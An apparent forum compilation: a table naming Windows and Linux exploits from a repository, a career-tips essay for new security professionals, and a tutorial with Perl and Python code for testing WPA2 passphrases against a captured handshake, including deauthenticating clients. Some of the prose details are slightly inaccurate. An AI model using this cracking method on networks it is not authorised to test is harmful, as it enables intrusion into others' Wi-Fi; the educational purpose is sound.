| Local | Priv Esc       | Linux    | Kernel <= 3.2.2      | /lin/pe-memodipper      | C    |

Windows

| Where  | Type            | Platform                    | Sploit         | Dir                 | Lang        |
|--------|-----------------|-----------------------------|----------------|---------------------|-------------|
| Remote | Buffer Overflow | Windows XP SP2              | War-FTP 1.65   | /win/bof-warftp     | Python      |
| Remote | Buffer Overflow | Windows XP SP1              | CesarFTP 0.99g | /win/bof-cesarftp   | Python      |
| Remote | Buffer Overflow | Windows 7 SP1 - 6.1.7601    | SL Mail        | /win/slmail         | Python      |
| Local  | Priv Esc        | Windows (all up to 7 SP1?)  | KiTrap0D       | /win/pe-kitrap      | v C++       |
| Local  | Priv Esc        | Windows (2k XP 03 - all)    | keybd_event    | /win/pe-keybd-event | C           |
| Local  | Priv Esc        | Windows (XP SP3 & 03 SP2/3) | AFD.sys        | /win/pe-afd         | Python .exe |

To-do

| Where | Type | Platform | Sploit | Dir | Lang |
|-------|------|----------|--------|-----|------|
| x     | x    | x        | x      | x   | x    |

Source: https://github.com/tresacton/exploits
-
10 Tips for Aspiring Security Professionals

Nobody enters a new profession as an expert. The information security industry is so lucrative right now that schools are now implementing Information Security programs. As some of you may know, I am currently 22 years old and about to graduate college with a degree in Information Security. I will be the very first to say that after 4 years in a program tailored to security, I have learned nothing that will ever directly apply to a job in Information Security. You may ask “How is that possible?”. The answer is simple. These degrees don’t teach you skills that you will use in the field, they teach you how to think critically, problem solve and most importantly, they teach you how to learn.

I am going through the same process that thousands of students (and others) are going through. Information Security is scary, overwhelming and fast paced. As someone entering the industry (especially if you are young), you have A LOT of catch up to do. Not only do you have to learn and understand current attacker methodology and techniques, you have to learn past methodologies and techniques as well. Combine this with the need to learn scripting, programming, networking, protocols, etc. and you will find yourself stressed out and overwhelmed. I have encountered this first hand and am even going through it as I write this and because of that, I want to give a few tips to those either entering the industry or thinking about entering the industry.

1. Passion is essential

“If you love what you do, you’ll never have to work a day in your life”

This says it all. Learning concepts isn’t hard when you want to learn it. Same goes for applying those concepts. If you have passion toward information security, you are miles ahead of the majority of other folks in the industry. There are a lot of people that do this job because of the money. I can honestly say that I would remain in the information security/offensive security industry if it paid minimum wage. The job is easy if you love it.

2. Never Stop Learning

Concepts, technology and methodology will always be changing. Not only do you have to learn the past, but you have to learn the present and the future. Be a sponge and absorb every little bit of information that you can.

3. Learn the basics

First, learn the basics of computers, networking and programming. If you have a genuine passion for computers, this will be easy. I recommend getting a job doing helpdesk or general systems administration.

For example: I started working the helpdesk at a small company my sophomore year in college. All I did was fix monitors, printers and basic networking issues. After two years, I got a new job working the helpdesk and doing sysadmin work for a larger company. This gave me the opportunity to branch out and learn how a corporate network is set up and functions. I was able to learn the ins and outs of a domain and how it operates. With the basic understanding of how things work, you can then branch out into how to break them. Without this basic understanding, it will be hard to operate with an offensive (or defensive) mindset.

4. Dive in

From my experience, the only way to learn is to just jump in the deep end. Get in the weeds of things going on, even if you don’t understand it. The security industry is excellent at mentoring, so find a few people and stick by them. Most of the security professionals understand that by investing in you, they will help bring up an additional professional in an industry that is in desperate need of passionate professionals.

5. Contribute

As I stated above, get in the weeds of things, even if you don’t understand it. There are TONS of open source projects and tools out there. Find some that interest you and try to contribute. Or, even better, start your own research. Contribute to the community by completing and sharing some of your own work.

For example: When I first started, I had a massive interest in client side attacks. I started researching different client side attacks and in 2013, I found an old article from 2003 about malicious Microsoft Office macros. I decided to dive into that and started to do work geared towards using VBA macros in client side attacks.

6. Start a blog

This is something I cannot stress enough. By starting a blog, you are creating a portfolio of all your work. This is something other students and professionals can reference. Employers also like it as it details all of your work. This goes with tip 5. As you do your own research/work, write about it. Not only will you be contributing to the community but you will also be building up a portfolio.

7. Keep your head up

As I previously mentioned, the security industry is awesome about mentoring. I should also note that there are also people that find joy in tearing you and your work down. As you learn and grow, realize that you are not an expert in everything and you are human. Humans make mistakes, so you will too. When that happens, chalk it up as a learning experience. Don’t get discouraged or angry. The industry revolves around learning, no matter how brilliant you are.

For example: I did some research with Alternate Data Streams and using them with PowerShell and VBScript to obtain persistence on a compromised host. I did as much research as I could, wrote some code, published it and wrote a blog post. I was just entering into technology when Windows XP was phasing out so I had no experience with Alternate Data Streams. All I had was what I read and the code I wrote. When I published my blog post, I made the mistake of claiming this method of persistence as “Fileless”. As soon as I shared my post, I got torn apart by forensic and Incident Response professionals. They bashed me since Alternate Data Streams are not fileless, as I claimed them to be in my post. To be honest, I felt dumb and was tempted to just delete the post altogether. This will happen to anyone that contributes, I promise. Instead of getting discouraged, I remained professional, fixed my blog post and thanked those who jumped at the opportunity to smack me in the face. I’m glad they did because now, I know that Alternate Data Streams are not fileless. I took that as an opportunity to learn from those who are smarter than me. Again, just keep learning.

8. Remember where you came from

As you grow as a student and professional, you will likely become an expert in the field at some point. When this happens, don’t turn into a gigantic asshole. As I previously mentioned, the security industry is awesome about mentoring but there are also people who will sit and wait for the opportunity to bring you down. A lot of people see those new to the industry as “n00bs”, “dumb” and “inexperienced” and in turn, won’t give them the time of day. When someone comes to you with a question, no matter how dumb, answer them. They are asking you for a reason and being an asshole about it helps nobody. You were in that spot once so when someone approaches you (or “sticks with you”, as mentioned in tip 4), take them in and give them guidance.

I have started to see that the security industry is kind of like High School. There are different groups with different attitudes. Someone just entering the industry feels exactly like the first day of high school. They just want a friend. If you invest in someone, you will help grow them into a professional. This cycle repeats, so they will then hopefully do the same thing for the next rookie, etc.

9. Get yourself out there

Go to conferences and hang out with people. This is even more important when you are trying to get into the industry. By going to conferences, you can talk to people that you may see as an idol. Almost everyone will sit down with you and talk, because they understand the concept of not being an asshole. Those are the people you need to stick by.

Example: I started my journey into information security in 2013. I knew nothing and I knew nobody. I had a small presence on Twitter where I just followed some security guys, but that was it. I couldn’t afford to go to a conference, so I didn’t. I made a comment on Twitter one day about wanting to go to DerbyCon sometime and was met with open arms. Tickets were sold out, but someone offered to sell me their ticket. I was thrilled, but couldn’t afford to buy the ticket or hotel, so I politely declined. A few minutes later, that same person decided to just give me their ticket. They didn’t know me or what I was about, but they gave me their ticket anyway. I told my parents that I was going to this conference and that I would be sleeping in my car. Luckily, they decided to pay for the hotel. I ended up going to DerbyCon in 2013 and had the time of my life. I met some awesome people, made some amazing friends and saw some awesome talks. Going to the conference, I knew nobody. After the conference, I felt like a part of the family.

10. Stay humble

There is not a single person that is an expert in everything. There will always be someone smarter than you in certain areas. Put your ego aside and accept that you are not the smartest expert in the field. The moment that your ego gets in the way is the moment that you stop learning and fall behind. Share your knowledge and expertise with others and take in the knowledge and expertise of others. Sharing is caring.

All I can say is stay true to yourself, contribute, get your name out there and never stop learning. When given the opportunity, share your experiences and knowledge with those who want to learn. Ask questions, learn and get in the weeds. The last thing the industry needs is a “professional” who runs Nessus and puts their logo on the report. And most importantly, keep a good attitude and have fun!

–@enigma0x3

Sursa: https://enigma0x3.wordpress.com/2015/04/15/10-tips-for-aspiring-security-professionals/
-
Cracking WPA2 With Perl

Posted on May 7, 2015 by trevelyn

Introduction

Before we begin, let’s take a look at how the process of WPA2 encryption works. I feel this is a very necessary step for this advanced subject. How could we possibly begin to write an application to crack WPA2 if we have no idea how the protocol/authentication methods work? Also, I would like to note that I do realize that this is incredibly absurd to use the system administration tool Perl to do this, since it is quite slow in comparison to C programming for these heavy lifting tasks (we will see why later) (which I start you off with HERE), but it is still a good exercise to get familiar with the actual WPA2 cracking process for those already familiar with Perl.

Requirements

A packet capture file containing a WPA2 4-way handshake, and a single beacon frame from the AP – This is for simply viewing the values using a binary to hex tool for network packets, such as Wireshark, while coding your own tool with this article. I will be using Wireshark for a few examples and I also have prepared my own 4-way+1 beacon packet capture file that you can download here.

To use the code that I write, you will need a few Perl modules:

- Net::Pcap – For packet dis-assembly.
- Crypt::PBKDF2 – PMK hashing.
- Digest::SHA
- IO::File – Reading files faster than Perl’s open() function.

Terms Used

- Symmetric Key Algorithm or SKA – Cryptography method which uses identical keys to encrypt plain text data and decrypt cipher, or encrypted text.
- Pre-Shared Key – The key, or WPA2 password, used for the SKA process.
- EAP, or Extensible Authentication Protocol – the actual protocol for transporting WPA2 encrypted data (not to be confused with other protocols, such as 802.11).
- Pairwise Master Key (PMK) – a string derived using the EAP framework which is used in the process of creating the PTK.
- Pairwise Transient Key, or PTK –
- Message Integrity Code, or MIC – a checksum that is used to authenticate an encrypted message. It is often used as “MAC” for “Message Authentication Code” but since we already use MAC in computer communications to mean the hardware address of a radio, we use MIC.
- MAC Address – 6 byte, unique, network hardware address, e.g. “01:23:45:67:89:01”.
- BSSID or Basic Service Set Identifier – MAC address of the AP radio.
- ESSID or Extended Service Set Identifier – Network name, e.g. “Free WiFi”, or “linksys”.
- Nonce – random number used for initiating an encrypted communication.
- “Station” – refers to a wireless client on the BSS.
- “AP” Access Point – refers to the actual wireless access point or router.
- Radio – used synonymously with WiFi adapter or Network Interface Card, or NIC for short.
- RFMON or Radio Frequency Monitor Mode – Passive listening to 802.11 traffic with a special driver for the radio.
- Handshake – an authentication process used by parties wishing to communicate using encryption to protect the transmitted data.

Trolling for APs

If you analyze a packet capture file of 802.11 packets, you may see your client sending out “probe request” packets. These request packets are to stimulate nearby APs into sending out information such as the router/AP capabilities and name. The router’s response will be a packet known as a “probe response.” This is generally how all devices including our phones and tablets search for nearby WiFi access points. This type of “scanning,” or “trolling” in the case of noisy-wardriving phones and tablets, for APs is known as “active scanning.” It does not require a client radio to be in “monitor mode” or RFMON mode.

Open System Authentication

When a client station wants to connect to an access point, e.g. when we select it in our supplicant software or tap on the network name on our phone screens to connect, it first goes through the process of authentication which is often open system authentication, or OSA. OSA is a four-way handshake style process that must be completed before we go further. This process has often been compared to simply plugging a device into a wired network, e.g. the actual action of pushing the Ethernet cable into the laptop and the network port or switch.

1. Station –> Authentication Request –> AP.
2. AP –> Authentication Response –> Station.

Each one of these is a single unique 802.11 packet. This is where MAC address filtering is used. If the AP is set up to only allow certain MAC addresses of clients, which is a poor method of securing the network and should not be used alone, and the MAC address of the system or station which initiated the process is not in the AP’s “white-list”, the station is then rejected from the authentication process.

System Association

To finally “associate” the station system with the network/AP the station initiates an association by sending the AP an “association request.” The AP then updates a few tables, allocates resources (similar to starting up a program in a computer, the AP actually makes memory space for things for the station), and synchronizes with the station finishing the association process. This is, of course, if the AP accepts the station as a client. Below are the steps involved.

1. Station –> Association Request –> AP.
2. AP –> Association Response –> Station.

Pairwise Master Key (PMK)

The station already knows the PMK, or Pairwise Master Key value. This is pre-calculated by the station supplicant software using the following algorithm, PBKDF2(SHA1,4096,SALT_LEN,OUTPUT_LEN) where the SHA1 means that we are using the SHA1 cryptographic hash function. The number 4096 means that we are running the PBKDF2() function 4096 times for “key stretching” which makes the process of offline-brute-force cracking of the WPA2 passphrase that much harder. The SALT_LEN refers to the salt length of the encryption function, which is the length of the network name, since the network name, or ESSID, is used as the salt. The OUTPUT_LEN refers to how long we want the output string to be in bytes. Here is an example PMK directly from the pages of my book,

9051BA43660CAEC7A909FBBE6B91E4685F1457B5A2E23660D728AFBD2C7ABFBA

Now that the station and the AP know the PMK, we can move on to the next step, the 4-way handshake.

WPA2 4 Way Handshake

You may have heard of this “4-way handshake” process before, if you have ever used the Aircrack-NG suite of 802.11 penetration testing tools. This process starts with the AP creating a string, called an A-nonce, which stands for “AP Nonce.” The animation below shows how to view the A-nonce in Wireshark using the capture packet file I offer in the beginning of this article.

Gathering the AP nonce using Wireshark

The station also generates its own nonce value, called the S-nonce. The animation below shows how to access the S-nonce using Wireshark,

Gathering the station nonce from the 802.11 packets

Okay, let’s get our hands dirty. This is going to be complicated so maybe we should use a writing pad and take some notes? The A-nonce is first sent to the Station by the AP. The Station uses the PMK to calculate the Pairwise Transient Key, or PTK. This is done using a Pseudo-Random Function, or PRF. The PRF loops over a simple integer variable, let’s call it $i for the time being (i is commonly used in for() loop examples), starting at $i = 0, and stopping when $i == 3 – so four times total. During each loop, a new string is constructed by concatenating the hexadecimal byte value of the string “Pairwise key expansion \0\0” – which is “5061697277697365206b657920657870616e73696f6e00” and sometimes just referred to as PKE in technical documentation, both of the MAC addresses for the station radio and the AP radio, the A-nonce and the S-nonce, a zero “0”, and finally $i.

PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i

The “Pairwise key expansion \0\0” string is actually part of the IEEE 802.11i-2004. It literally is a string with two null bytes at the end of it. We encoded it into hex by taking the case-sensitive ASCII values of each letter in decimal and calculating their individual hexadecimal values. For example, 80 is the ASCII (decimal) value for the capital “P” and 97 is the ASCII (decimal) value for “a” which are the first two letters of our string. So we first calculate the hexadecimal value for these two numbers, which in base 16 become, 50 and 61 respectively. Notice the first two bytes of the string, “5061697277697365206b657920657870616e73696f6e00”, are 50 and 61? We do this for the entire string including the two null bytes at the end, which we simply denote using a single 0 for each.

To make this even more complex, the order in which all of these values are concatenated, matters! In the string above, we actually have to use the MAC address (station or AP) that is lowest in hexadecimal value first, and same goes for the nonce values. The nonce which is lowest in hexadecimal value goes first in our string as well. Before the string becomes part of the PTK, it is packed using the pack() Perl function and sent into the HMAC_SHA1() function along with the PMK string that acts as a “key.” The value returned from the HMAC_SHA() function is then concatenated to an empty string, let’s call it $ptkGen. As $i increments to 1, the process starts over and the final result of the new iteration is then appended to the value in $ptkGen (itself). After all 4 iterations are complete, the PTK is then completely calculated as four concatenated strings into $ptkGen by the station. (Well, not really, I am sure the AP doesn’t use Perl. We do for this exercise).

Next, the station sends the AP the S-nonce and the Message Integrity Check or MIC value. This MIC value is what we will finally use to crack the PSK. Below is an animation I made to show how to check an MIC in the 4-way handshake by hand using Wireshark.

Gathering the MIC integrity check using Wireshark

Aircrack-NG and our Perl code only really need two of the 4 packets in a four-way handshake. This is because the first two packets have both the A-Nonce and S-Nonce values in them AND the MIC. The second two packets also have the same information. We cannot, however, crack the key with just packets 2 and 4, or 1 and 3. The MIC is the “key” to our treasure, so to speak. This means that for each word in our dictionary file, we are going to go through this entire process over-and-over calculating a new PMK and PTK, hash the message body of the (captured) transmitted packet and check the MIC value. If the MIC value that we have calculated matches that in the 802.11 packet, then we have used the correct PSK in the process and thus know the secret password to the network.

Heavy lifting for Perl!

The message body can be obtained from the packet using the following line of Perl,

$msg = unpack("H*",substr($pkt,60,121));

This is the 60th to the 121st bytes in the packet using the packet’s very first byte as an offset. We assign the message body to $msg. The message is what we finally hash using the PTK to calculate the MIC. First, we need to take out the MIC from the message body. By “take out” we need to actually “zero-out” the MIC, and we do so with the Perl substitution operator with the following 2 lines,

my $pad = "0"x32; # 16 null bytes for padding
$msg =~ s/$mic/$pad/i; # remove the WPA2 MIC value string

This is two lines of code, just so we don’t have a single line with 55 “0” characters in length, not including the comment. We will, once again, be using the HMAC_SHA1() function from the Digest::HMAC_SHA1 Perl module to check the MIC with our PTK. We do so by passing it the (packed up) value of the message body, $msg and the first 32 bytes of the (packed up) PTK, $ptk like so:

my $digest = hmac_sha1(pack("H*",$msg),pack("H*",substr(unpack("H*",$ptk),0,32)));

Now, we check the sub-string of bytes 1 through 16 of the digest, $digest, with that of the MIC, $mic, like so (16 bytes are 32 hex characters, so the comparison starts at offset 0 and runs for 32 characters):

if(substr(unpack("H*",$digest),0,32) eq substr($mic,0,32)){
    print "PTK: ",unpack("H*",$ptk),"\n";
    print "\n\n\tKEY FOUND: [ ",$psk," ] \n\n";
    exit; # we are done
}

And that is all I did to create a simple brute-force tool, like (but not as efficient as the (oh the beautiful language of C <3) GO LEARN C RIGHT NOW! >) Aircrack-NG suite. Below is the exact same code I used in my incredibly-boring book Penetration Testing with Perl. I have added lots of comments, and for those who have read all the way through this text (or simply understand how encrypted communication works), this should not resemble “write-only” code.

Conclusion

This is a proof of concept. Stimulating and picking apart the 802.11 transactions with Wireshark is recommended and my WEAKERTHAN Linux distribution has all of the necessary tools to do so. By “stimulating,” I simply mean, using Aircrack-NG’s Aireplay-NG to de-authenticate a client causing it to re-authenticate using the 4-way handshake process described above. We do this because if we do, in fact, crack the PSK, or WPA2 passphrase, we can decrypt the traffic using Wireshark – if and only if (to my knowledge at least) this 4-way handshake is in the packet trace.

To make things clear with my readers – I don’t have customers. I don’t make money for writing weblog posts or code. I am not an engineer or college graduate for that matter. I am simply passionate about information security and 802.11, and love sharing what I find or create. PLEASE email me or comment if I have left something out of this, or any article that I write! To my knowledge, there was not a single instance of cracking WPA2 using Perl online anywhere before I wrote my book or created this code. I went through a lot of trial and error, but figured it all out myself (Here is proof) a la reversing the protocol in Wireshark and reading about it from the IEEE. Besides the few Perl modules used for hashing functions, I wrote this from scratch.

~Douglas

Sursa: http://weaknetlabs.com/main/?p=2969
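The derivation the post walks through (PBKDF2 to the PMK, the four-round PRF to the PTK, HMAC-SHA1 over the zeroed EAPOL body to the MIC), as an added example that is not the post's own code and is written in Python rather than Perl. The SSID, MAC addresses, nonces and EAPOL-Key message 2 body are all constructed here, so the block shows, offline, why a single captured handshake is enough to test a candidate passphrase and therefore why PSK strength is the only defence that matters.

```python
"""Added example, not code from the original post: derive the WPA2 PMK, PTK and
EAPOL-Key MIC for a constructed 4-way handshake, then verify a candidate passphrase
against it. SSID, MAC addresses, nonces and the EAPOL body are all constructed."""
import hashlib
import hmac

PKE = b"Pairwise key expansion"  # IEEE 802.11i label; the PRF appends the 0x00 byte
MIC_OFFSET = 81                   # offset of the 16-byte MIC field in an EAPOL-Key frame

# Constructed sample handshake parameters (not values from any real network)
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PSK = "correct horse battery"
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # 22-byte CCMP/PSK IE


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32-byte output)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK: lower MAC before higher, lower nonce before higher; the order matters."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, PKE, data)[:64]  # KCK = first 16 bytes, used for the MIC


def build_msg2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2: descriptor 2, key info 0x010a, replay counter 1."""
    body = (b"\x02\x01\x0a\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 32 + mic + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes, frame: bytes) -> bool:
    """The check one captured handshake permits: recompute the MIC under a candidate PSK."""
    pmk = pmk_from_passphrase(candidate, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    observed = frame[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, frame), observed)


def constructed_handshake() -> bytes:
    """Message 2 as the station would send it, with the MIC computed under TRUE_PSK."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_msg2(SNONCE, b"\x00" * 16, RSN_IE)
    return build_msg2(SNONCE, eapol_mic(kck, unsigned), RSN_IE)


if __name__ == "__main__":
    frame = constructed_handshake()
    for guess in ("password", "wrong passphrase", TRUE_PSK):
        ok = passphrase_matches(guess, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame)
        print(f"{guess!r}: {'MIC matches' if ok else 'no match'}")
```

The constructed message 2 comes out at 121 bytes, the same length the post's substr($pkt,60,121) extracts, because a 22-byte RSN IE is the usual key data in that frame.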